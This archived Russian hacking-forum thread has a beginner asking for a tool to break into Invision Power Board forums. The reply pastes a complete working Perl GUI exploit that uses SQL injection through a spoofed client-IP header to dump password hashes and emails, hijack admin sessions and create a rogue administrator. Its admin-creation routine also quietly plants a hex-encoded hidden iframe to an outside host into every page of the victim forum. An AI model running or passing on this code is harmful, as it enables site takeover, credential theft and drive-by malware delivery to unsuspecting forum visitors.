Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

программа для взлома ipb

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> программа для взлома ipb
Имя
Сообщение << Старые топики   Новые топики >>
программа для взлома ipb - 2010-03-26 17:58:26.030000   
alexskb

Сообщений: 20
Оценки: 0
Присоединился: 2010-03-25 20:40:35.140000
 люди всем привет.
вот видел видео как один чел за 2 минуты ломает форум.
вот видео
http://www.youtube.com/watch?v=Jx5X5IIG54s
хотелось бы знать что это за прога и где ее взять?
можно по подробнее о программе?
Post #: 1
RE: программа для взлома ipb - 2010-03-26 18:20:25.640000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
 #!/usr/bin/perl ## Invision Power Board v2.1 &lt;= 2.1.6 sql injection exploit by RST/GHC ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 ## [link=http://rst.void.ru/papers/advisory41.txt]http://rst.void.ru/papers/advisory41.txt[/link] ## tested on 2.1.3, 2.1.6 ## ## 08.06.06 ## (c)oded by 1dt.w0lf ## RST/GHC ## [link=http://rst.void.ru]http://rst.void.ru[/link] ## [link=http://ghc.ru]http://ghc.ru[/link] use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title =&gt; "r57ipb216gui" ); $mw-&gt;geometry ( '420x550' ) ; $mw-&gt;resizable(0,0); $mw-&gt;Label(-text =&gt; '!', -font =&gt; '{Webdings} 22')-&gt;pack(); $mw-&gt;Label(-text =&gt; 'Invision Power Board 2.1.* &lt;= 2.1.6 sql injection exploit by RST/GHC', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack(); $mw-&gt;Label(-text =&gt; '')-&gt;pack(); $fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ; $fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ; $url = 'http://server/forum/index.php'; $user_id = '1'; $prefix = 'ibf_'; $table = 'members'; $column = 'member_login_key'; $new_admin_name = 'rstghc'; $new_admin_password = 'rstghc'; $new_admin_email = 'billy@microsoft.com'; $report = ''; $group = 4; $curr_user = 0; $rand_session = &amp;session(); $use_custom_fields = 0; $custom_fields = 'name1=value1,name2=value2'; $fleft-&gt;Label ( -text =&gt; 'Path to forum index: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'User ID: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$user_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'Database tables prefix: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$prefix) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fright-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label ( -text =&gt; 'get data from database', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label ( -text =&gt; 'Get data from table: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $b2 = $fright-&gt;BrowseEntry( -command =&gt; \&amp;update_columns, -relief =&gt; "groove", -variable =&gt; \$table, -font =&gt; '{Verdana} 8'); $b2-&gt;insert("end", "members"); $b2-&gt;insert("end", "members_converge"); $b2-&gt;pack( -side =&gt; "top" , -anchor =&gt; 'w'); $fleft-&gt;Label ( -text =&gt; 'Get data from column: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $b = $fright-&gt;BrowseEntry( -relief =&gt; "groove", -variable =&gt; \$column, -font =&gt; '{Verdana} 8'); $b-&gt;insert("end", "member_login_key"); $b-&gt;insert("end", "name"); $b-&gt;insert("end", "ip_address"); $b-&gt;insert("end", "legacy_password"); $b-&gt;insert("end", "email"); $b-&gt;pack( -side =&gt; "top" , -anchor =&gt; 'w' ); $fleft-&gt;Label ( -text =&gt; 'Returned data: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$report) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'create new admin', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label ( -text =&gt; ' ')-&gt;pack(); $fright-&gt;Checkbutton( -font =&gt; '{Verdana} 8', -text =&gt; 'Get admin session for inserted user ID', -variable =&gt; \$curr_user)-&gt;pack(-side =&gt; "top" , -anchor =&gt; 'w'); $fleft-&gt;Label ( -text =&gt; 'session_id: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$session_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'session_ip_address: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$session_ip_address) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'new admin name: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$new_admin_name) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'new admin password: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$new_admin_password) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; 'new_admin_email: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$new_admin_email) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fleft-&gt;Label ( -text =&gt; ' ')-&gt;pack(); $fright-&gt;Checkbutton( -font =&gt; '{Verdana} 8', -text =&gt; 'Use custom profile fields', -variable =&gt; \$use_custom_fields)-&gt;pack(-side =&gt; "top" , -anchor =&gt; 'w'); $fleft-&gt;Label ( -text =&gt; 'custom fields: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ; $fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$custom_fields) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ; $fright-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fright-&gt;Button(-text&nbsp;&nbsp;&nbsp; =&gt; 'Test forum vulnerability', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -relief =&gt; "groove", &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -width =&gt; '30', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -font =&gt; '{Verdana} 8 bold', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -activeforeground =&gt; 'red', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -command =&gt; \&amp;test_vuln &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )-&gt;pack(); $fright-&gt;Button(-text&nbsp;&nbsp;&nbsp; =&gt; 'Get database tables prefix', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -relief =&gt; "groove", &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -width =&gt; '30', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -font =&gt; '{Verdana} 8 bold', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -activeforeground =&gt; 'red', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -command =&gt; \&amp;get_prefix &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )-&gt;pack(); $fright-&gt;Button(-text&nbsp;&nbsp;&nbsp; =&gt; 'Get data from database', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -relief =&gt; "groove", &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -width =&gt; '30', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -font =&gt; '{Verdana} 8 bold', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -activeforeground =&gt; 'red', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -command =&gt; \&amp;get_data &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )-&gt;pack(); $fright-&gt;Button(-text&nbsp;&nbsp;&nbsp; =&gt; 'Get admin session', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -relief =&gt; "groove", &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -width =&gt; '30', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -font =&gt; '{Verdana} 8 bold', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -activeforeground =&gt; 'red', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -command =&gt; \&amp;get_admin &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )-&gt;pack(); $fright-&gt;Button(-text&nbsp;&nbsp;&nbsp; =&gt; 'Create new admin', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -relief =&gt; "groove", &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -width =&gt; '30', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -font =&gt; '{Verdana} 8 bold', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -activeforeground =&gt; 'red', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -command =&gt; \&amp;create_admin &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )-&gt;pack(); $fleft-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label( -text =&gt; ' ')-&gt;pack(); $fleft-&gt;Label( -text =&gt; '(c)oded by 1dt.w0lf', -font =&gt; '{Verdana} 7')-&gt;pack(); $fleft-&gt;Label( -text =&gt; 'RST/GHC', -font =&gt; '{Verdana} 7')-&gt;pack(); $fleft-&gt;Label( -text =&gt; 'http://rst.void.ru', -font =&gt; '{Verdana} 7')-&gt;pack(); $fleft-&gt;Label( -text =&gt; 'http://ghc.ru', -font =&gt; '{Verdana} 7')-&gt;pack(); MainLoop(); sub update_columns() { $b-&gt;delete(0,"end"); if($table eq 'members'){ $column = "member_login_key";&nbsp; $b-&gt;insert("end", "member_login_key"); $b-&gt;insert("end", "name"); $b-&gt;insert("end", "ip_address"); $b-&gt;insert("end", "legacy_password"); $b-&gt;insert("end", "email"); } elsif($table eq 'members_converge'){ $column = "converge_pass_hash";&nbsp; $b-&gt;insert("end", "converge_pass_hash"); $b-&gt;insert("end", "converge_pass_salt"); $b-&gt;insert("end", "converge_email"); } } sub get_admin() { $xpl = LWP::UserAgent-&gt;new( ) or die; $InfoWindow=$mw-&gt;DialogBox(-title&nbsp;&nbsp; =&gt; 'get admin session', -buttons =&gt; ["OK"]); if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } else { $sql = ''; } $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time &gt; (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*"); $error = 0; $rep = ''; if($res-&gt;is_success) { if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; } else { $error = 1; } if(!$error) { $rep = ''; $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time &gt; (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*"); if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; } else { $error = 1; } if(!$error){ if($curr_user != 1) { $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*"); if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; } } else { $session_user_id = $user_id; } $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; } $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; } } $InfoWindow-&gt;add('Label', -text =&gt; 'Found session!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'Green')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'session_ip_address: '.$session_ip_address, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'session_id: '.$session_id, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'user_id: '.$session_user_id, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'username: '.$name, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'group: '.$group, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; } } else { $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; }&nbsp;&nbsp;&nbsp; if($error) { $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get admin session.', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'Maybe admin session not exist. Please try later.', -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; } } sub get_data() { $xpl = LWP::UserAgent-&gt;new( ) or die; $InfoWindow=$mw-&gt;DialogBox(-title&nbsp;&nbsp; =&gt; 'get data from database', -buttons =&gt; ["OK"]); if($table eq 'members') { $id_text = 'id'; } if($table eq 'members_converge') { $id_text = 'converge_id'; } $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*"); if($res-&gt;is_success) { $rep = '';&nbsp; if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; } else { $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get data from database', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; } } else { $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; }&nbsp;&nbsp; } sub create_admin() { $InfoWindow=$mw-&gt;DialogBox(-title&nbsp;&nbsp; =&gt; 'create new admin', -buttons =&gt; ["OK"]); if($session_id eq '' || $session_ip_address eq '') { $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'You need insert admin session_id and session_ip_address', -font =&gt; '{Verdana} 8')-&gt;pack; } elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'session_ip_address wrong!', -font =&gt; '{Verdana} 8')-&gt;pack; } else { $xpl = LWP::UserAgent-&gt;new( ) or die; ($url2 = $url) =~ s/index.php/admin.php/; $cf = ''; %fields = ( 'code'&nbsp;&nbsp;&nbsp;&nbsp; =&gt; 'doadd', 'act'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; 'mem', 'section'&nbsp; =&gt; 'content', 'name'&nbsp;&nbsp;&nbsp;&nbsp; =&gt; $new_admin_name, 'password' =&gt; $new_admin_password, 'email'&nbsp;&nbsp;&nbsp; =&gt; $new_admin_email, 'mgroup'&nbsp;&nbsp; =&gt; $group,&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ); if($use_custom_fields) { @cf = split(',',$custom_fields); foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;} } $res = $xpl-&gt;post($url2."?adsess=$session_id", [ %fields, ], 'USER_AGENT'=&gt;'', 'CLIENT_IP'=&gt;"$session_ip_address", 'X_FORWARDED_FOR'=&gt;"$session_ip_address"); $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E'; $query&nbsp; = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")"; $res = $xpl-&gt;post($url2."?adsess=$session_id", [ 'code'&nbsp;&nbsp;&nbsp;&nbsp; =&gt; 'runsql', 'act'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; 'sql', 'section'&nbsp; =&gt; 'admin', 'query'&nbsp;&nbsp;&nbsp;&nbsp; =&gt; $query, ], 'USER_AGENT'=&gt;'', 'CLIENT_IP'=&gt;"$session_ip_address", 'X_FORWARDED_FOR'=&gt;"$session_ip_address"); $InfoWindow-&gt;add('Label', -text =&gt; 'Done!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; 'New admin created', -font =&gt; '{Verdana} 8 bold')-&gt;pack; } $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; } sub test_vuln() { $InfoWindow=$mw-&gt;DialogBox(-title&nbsp;&nbsp; =&gt; 'test forum vulnerability', -buttons =&gt; ["OK"]); $InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack; $xpl = LWP::UserAgent-&gt;new( ) or die; $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"' UNION SELECT 'VULN',1,1,1/*"); if($res-&gt;is_success) { $rep = ''; if($res-&gt;as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } if($rep eq 'VULN') { $InfoWindow-&gt;add('Label', -text =&gt; 'FORUM VULNERABLE', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; } else { $InfoWindow-&gt;add('Label', -text =&gt; 'FORUM UNVULNERABLE', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green')-&gt;pack; } } else { $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack; } $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy; } sub get_prefix() { $InfoWindow=$mw-&gt;DialogBox(-title&nbsp;&nbsp; =&gt; 'get database tables prefix', -buttons =&gt; ["OK"]); $InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack; $xpl = LWP::UserAgent-&gt;new( ) or die; $res = $xpl-&gt;get($url."?s=$rand_session",'USER_AGENT'=&gt;'','CLIENT_IP'=&gt;"'"); if($res-&gt;is_success) { $rep = ''; if($res-&gt;as_string =~ /FROM (.*)sessions/) { $prefix = $1; $InfoWindow-&gt;add('Label', -text =&gt; 'Prefix: '.$prefix, -font =&gt; '{Verdana} 8 bold')-&gt;pack; } else { $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get prefix', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; } } else { $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack; } $InfoWindow-&gt;Show(); $InfoWindow-&gt;destroy;&nbsp; } sub session() { return 'r57ipb216_for_IDS';&nbsp; } # milw0rm.com [2006-07-14]

r57ipb Gui exp

Видео лет сто
Post #: 2
Страниц:  [1]
Все форумы >> [Для начинающих] >> программа для взлома ipb







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.